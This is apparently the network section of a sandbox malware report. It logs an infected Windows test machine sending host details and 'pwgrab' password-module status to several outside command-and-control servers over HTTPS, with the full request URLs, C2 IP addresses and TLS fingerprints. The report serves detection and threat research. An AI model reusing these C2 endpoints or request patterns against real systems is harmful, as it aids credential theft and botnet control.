Network Analysis
IP Address | Status | Action |
---|---|---|
103.26.251.214 | Active | Moloch |
12.158.156.51 | Active | Moloch |
137.27.167.58 | Active | Moloch |
164.124.101.2 | Active | Moloch |
172.217.25.14 | Active | Moloch |
24.182.101.64 | Active | Moloch |
45.164.80.94 | Active | Moloch |
67.212.241.127 | Active | Moloch |
67.79.117.70 | Active | Moloch |
72.180.57.176 | Active | Moloch |
75.87.15.158 | Active | Moloch |
95.217.228.176 | Active | Moloch |
98.6.170.206 | Active | Moloch |
Name | Response | Post-Analysis Lookup |
---|---|---|
150.134.208.175.b.barracudacentral.org | 127.0.0.2 | |
150.134.208.175.zen.spamhaus.org | | |
wtfismyip.com | 95.217.228.176 | |
150.134.208.175.cbl.abuseat.org | | |
TCP Requests
- 192.168.56.102:49826 137.27.167.58:443
- 192.168.56.102:49797 172.217.25.14:443
- 192.168.56.102:49812 192.168.56.103:2869
- 192.168.56.102:49813 192.168.56.103:5357
- 192.168.56.102:49830 24.182.101.64:449
- 192.168.56.102:49823 45.164.80.94:447
- 192.168.56.102:49821 67.79.117.70:443
- 192.168.56.102:49814 72.180.57.176:443
- 192.168.56.102:49815 75.87.15.158:443
- 192.168.56.102:49816 95.217.228.176:80 (wtfismyip.com)
- 192.168.56.102:49818 98.6.170.206:447
UDP Requests
- 192.168.56.102:50839 164.124.101.2:53
- 192.168.56.102:54660 164.124.101.2:53
- 192.168.56.102:57660 164.124.101.2:53
- 192.168.56.102:61459 164.124.101.2:53
- 192.168.56.102:137 192.168.56.255:137
- 192.168.56.102:138 192.168.56.255:138
- 192.168.56.102:49152 239.255.255.250:3702
- 192.168.56.102:56752 239.255.255.250:1900
- 192.168.56.102:56754 239.255.255.250:3702
- 192.168.56.102:56756 239.255.255.250:3702
- 192.168.56.102:56758 239.255.255.250:3702
- 192.168.56.103:3702 192.168.56.102:56758
HTTP Requests

GET 200 https://72.180.57.176/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/5/kps/
Request:
GET /rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/5/kps/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.72.0
Host: 72.180.57.176
Response:
HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Tue, 30 Mar 2021 01:48:58 GMT
Content-Type: application/octet-stream
Content-Length: 224
Connection: keep-alive

GET 200 https://75.87.15.158/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/5/kps/
Request:
GET /rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/5/kps/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.72.0
Host: 75.87.15.158
Response:
HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Tue, 30 Mar 2021 01:49:01 GMT
Content-Type: application/octet-stream
Content-Length: 224
Connection: keep-alive

GET 200 https://75.87.15.158/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/0/Windows%207%20x64%20SP1/1105/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/jdtzrTn7D1fhJNbBNVH7NJBPBDzrN/
Request:
GET /rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/0/Windows%207%20x64%20SP1/1105/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/jdtzrTn7D1fhJNbBNVH7NJBPBDzrN/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.72.0
Host: 75.87.15.158
Response:
HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Tue, 30 Mar 2021 01:49:03 GMT
Content-Type: text/plain
Content-Length: 1309
Connection: keep-alive

GET 200 https://75.87.15.158/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/14/exc/E:%200xc0000005%20A:%200x00000000771D9A5A/0/
Request:
GET /rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/14/exc/E:%200xc0000005%20A:%200x00000000771D9A5A/0/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.72.0
Host: 75.87.15.158
Response:
HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Tue, 30 Mar 2021 01:49:04 GMT
Content-Type: text/plain
Content-Length: 3
Connection: keep-alive

GET 200 https://75.87.15.158/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/14/user/test22/0/
Request:
GET /rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/14/user/test22/0/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.72.0
Host: 75.87.15.158
Response:
HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Tue, 30 Mar 2021 01:49:04 GMT
Content-Type: text/plain
Content-Length: 3
Connection: keep-alive

GET 200 https://75.87.15.158/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/14/path/C:%5CUsers%5Ctest22%5CAppData%5CRoaming%5CNetDownloadMng5575191179%5Cxzcountlb.dwn/0/
Request:
GET /rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/14/path/C:%5CUsers%5Ctest22%5CAppData%5CRoaming%5CNetDownloadMng5575191179%5Cxzcountlb.dwn/0/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.72.0
Host: 75.87.15.158
Response:
HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Tue, 30 Mar 2021 01:49:05 GMT
Content-Type: text/plain
Content-Length: 3
Connection: keep-alive

GET 200 https://75.87.15.158/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/14/NAT%20status/client%20is%20behind%20NAT/0/
Request:
GET /rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/14/NAT%20status/client%20is%20behind%20NAT/0/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.72.0
Host: 75.87.15.158
Response:
HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Tue, 30 Mar 2021 01:49:05 GMT
Content-Type: text/plain
Content-Length: 3
Connection: keep-alive

GET 200 https://67.79.117.70/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/5/kps/
Request:
GET /rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/5/kps/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.72.0
Host: 67.79.117.70
Response:
HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Tue, 30 Mar 2021 01:49:35 GMT
Content-Type: application/octet-stream
Content-Length: 224
Connection: keep-alive

GET 200 https://67.79.117.70/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/0/Windows%207%20x64%20SP1/1105/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/1jdJTPhNJftt9llb5HDzBt1d1t3/
Request:
GET /rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/0/Windows%207%20x64%20SP1/1105/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/1jdJTPhNJftt9llb5HDzBt1d1t3/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.72.0
Host: 67.79.117.70
Response:
HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Tue, 30 Mar 2021 01:49:35 GMT
Content-Type: text/plain
Content-Length: 1307
Connection: keep-alive

GET 200 https://67.79.117.70/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/14/exc/E:%200xc0000005%20A:%200x00000000771D9A5A/0/
Request:
GET /rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/14/exc/E:%200xc0000005%20A:%200x00000000771D9A5A/0/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.72.0
Host: 67.79.117.70
Response:
HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Tue, 30 Mar 2021 01:49:36 GMT
Content-Type: text/plain
Content-Length: 3
Connection: keep-alive

GET 200 https://67.79.117.70/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/14/user/test22/0/
Request:
GET /rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/14/user/test22/0/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.72.0
Host: 67.79.117.70
Response:
HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Tue, 30 Mar 2021 01:49:37 GMT
Content-Type: text/plain
Content-Length: 3
Connection: keep-alive

GET 200 https://67.79.117.70/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/14/NAT%20status/client%20is%20behind%20NAT/0/
Request:
GET /rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/14/NAT%20status/client%20is%20behind%20NAT/0/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.72.0
Host: 67.79.117.70
Response:
HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Tue, 30 Mar 2021 01:49:37 GMT
Content-Type: text/plain
Content-Length: 3
Connection: keep-alive

GET 403 https://67.79.117.70/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/10/62/QHAVHUMUVKIZYSUYVK/7/
Request:
GET /rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/10/62/QHAVHUMUVKIZYSUYVK/7/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.72.0
Host: 67.79.117.70
Response:
HTTP/1.1 403 Forbidden
Server: nginx/1.10.3
Date: Tue, 30 Mar 2021 01:49:38 GMT
Content-Length: 9
Connection: keep-alive

GET 404 https://67.79.117.70/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/23/2000027/
Request:
GET /rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/23/2000027/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.72.0
Host: 67.79.117.70
Response:
HTTP/1.1 404 Not Found
Server: nginx/1.10.3
Date: Tue, 30 Mar 2021 01:49:38 GMT
Content-Length: 9
Connection: keep-alive

GET 200 https://67.79.117.70/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/14/DNSBL/listed/0/
Request:
GET /rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/14/DNSBL/listed/0/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.72.0
Host: 67.79.117.70
Response:
HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Tue, 30 Mar 2021 01:49:41 GMT
Content-Type: text/plain
Content-Length: 3
Connection: keep-alive

GET 200 https://67.79.117.70/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/1/pxPtLlVV7rz3hFHPxXVH9ntpH3/
Request:
GET /rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/1/pxPtLlVV7rz3hFHPxXVH9ntpH3/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.72.0
Host: 67.79.117.70
Response:
HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Tue, 30 Mar 2021 01:49:41 GMT
Content-Type: text/plain
Content-Length: 121
Connection: keep-alive

GET 200 https://137.27.167.58/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/5/kps/
Request:
GET /rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/5/kps/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.72.0
Host: 137.27.167.58
Response:
HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Tue, 30 Mar 2021 01:49:58 GMT
Content-Type: application/octet-stream
Content-Length: 224
Connection: keep-alive

GET 200 https://137.27.167.58/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/0/Windows%207%20x64%20SP1/1105/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/JXX9LFPNtFT75Htn3nVXhlnxNLP/
Request:
GET /rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/0/Windows%207%20x64%20SP1/1105/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/JXX9LFPNtFT75Htn3nVXhlnxNLP/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.72.0
Host: 137.27.167.58
Response:
HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Tue, 30 Mar 2021 01:49:59 GMT
Content-Type: text/plain
Content-Length: 1307
Connection: keep-alive

GET 200 https://137.27.167.58/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/14/exc/E:%200xc0000005%20A:%200x00000000771D9A5A/0/
Request:
GET /rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/14/exc/E:%200xc0000005%20A:%200x00000000771D9A5A/0/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.72.0
Host: 137.27.167.58
Response:
HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Tue, 30 Mar 2021 01:50:00 GMT
Content-Type: text/plain
Content-Length: 3
Connection: keep-alive

GET 200 https://137.27.167.58/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/14/user/test22/0/
Request:
GET /rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/14/user/test22/0/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.72.0
Host: 137.27.167.58
Response:
HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Tue, 30 Mar 2021 01:50:01 GMT
Content-Type: text/plain
Content-Length: 3
Connection: keep-alive

GET 200 https://137.27.167.58/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/1/4j4pxaBWesD3gH7yYCXrlLdHM/
Request:
GET /rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/1/4j4pxaBWesD3gH7yYCXrlLdHM/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.72.0
Host: 137.27.167.58
Response:
HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Tue, 30 Mar 2021 01:50:01 GMT
Content-Type: text/plain
Content-Length: 120
Connection: keep-alive

GET 200 https://137.27.167.58/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/10/62/707854/0/
Request:
GET /rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/10/62/707854/0/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.72.0
Host: 137.27.167.58
Response:
HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Tue, 30 Mar 2021 01:50:02 GMT
Content-Type: text/plain
Content-Length: 3
Connection: keep-alive

GET 200 https://137.27.167.58/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/14/pwgrab/sTart%20Run%20D%20failed/0/
Request:
GET /rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/14/pwgrab/sTart%20Run%20D%20failed/0/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.72.0
Host: 137.27.167.58
Response:
HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Tue, 30 Mar 2021 01:50:02 GMT
Content-Type: text/plain
Content-Length: 3
Connection: keep-alive

GET 200 https://137.27.167.58/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/14/pwgrab64/reload1/0/
Request:
GET /rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/14/pwgrab64/reload1/0/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.72.0
Host: 137.27.167.58
Response:
HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Tue, 30 Mar 2021 01:50:03 GMT
Content-Type: text/plain
Content-Length: 3
Connection: keep-alive

GET 200 http://wtfismyip.com/text
Request:
GET /text HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.72.0
Host: wtfismyip.com
Response:
HTTP/1.1 200 OK
Access-Control-Allow-Methods: GET
Access-Control-Allow-Origin: *
Content-Type: text/plain
Date: Tue, 30 Mar 2021 01:49:02 GMT
Content-Length: 16
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.102:49814 72.180.57.176:443 | C=AU, ST=Some-State, O=Internet Widgits Pty Ltd | C=AU, ST=Some-State, O=Internet Widgits Pty Ltd | a1:ea:a4:fa:0a:5e:ba:b9:c1:46:42:a3:0b:3e:a6:e7:b4:e2:f7:f0 |
TLSv1 192.168.56.102:49823 45.164.80.94:447 | C=US, ST=IL, L=Chicago, O=Internet Widgits Pty Ltd | C=US, ST=IL, L=Chicago, O=Internet Widgits Pty Ltd | f1:ae:ef:9b:5f:b8:da:ca:2f:e8:b4:99:1d:16:71:ca:08:11:be:e4 |
TLSv1 192.168.56.102:49815 75.87.15.158:443 | C=AU, ST=Some-State, O=Internet Widgits Pty Ltd | C=AU, ST=Some-State, O=Internet Widgits Pty Ltd | 81:c4:f0:b6:a7:40:f0:09:2b:ab:2a:1c:df:80:a0:30:da:d8:93:79 |
TLSv1 192.168.56.102:49821 67.79.117.70:443 | C=AU, ST=Some-State, O=Internet Widgits Pty Ltd | C=AU, ST=Some-State, O=Internet Widgits Pty Ltd | 81:c4:f0:b6:a7:40:f0:09:2b:ab:2a:1c:df:80:a0:30:da:d8:93:79 |
TLSv1 192.168.56.102:49818 98.6.170.206:447 | C=US, ST=Some-State, O=Internet Widgits Pty Ltd | C=US, ST=Some-State, O=Internet Widgits Pty Ltd | 8d:b6:86:81:b0:6b:e5:0a:58:13:73:ec:a7:95:6f:f6:4b:e2:e9:d8 |
TLSv1 192.168.56.102:49826 137.27.167.58:443 | C=AU, ST=Some-State, O=Internet Widgits Pty Ltd | C=AU, ST=Some-State, O=Internet Widgits Pty Ltd | 81:c4:f0:b6:a7:40:f0:09:2b:ab:2a:1c:df:80:a0:30:da:d8:93:79 |
TLSv1 192.168.56.102:49830 24.182.101.64:449 | C=AU, ST=Some-State, O=Internet Widgits Pty Ltd | C=AU, ST=Some-State, O=Internet Widgits Pty Ltd | 81:c4:f0:b6:a7:40:f0:09:2b:ab:2a:1c:df:80:a0:30:da:d8:93:79 |
Snort Alerts
No Snort Alerts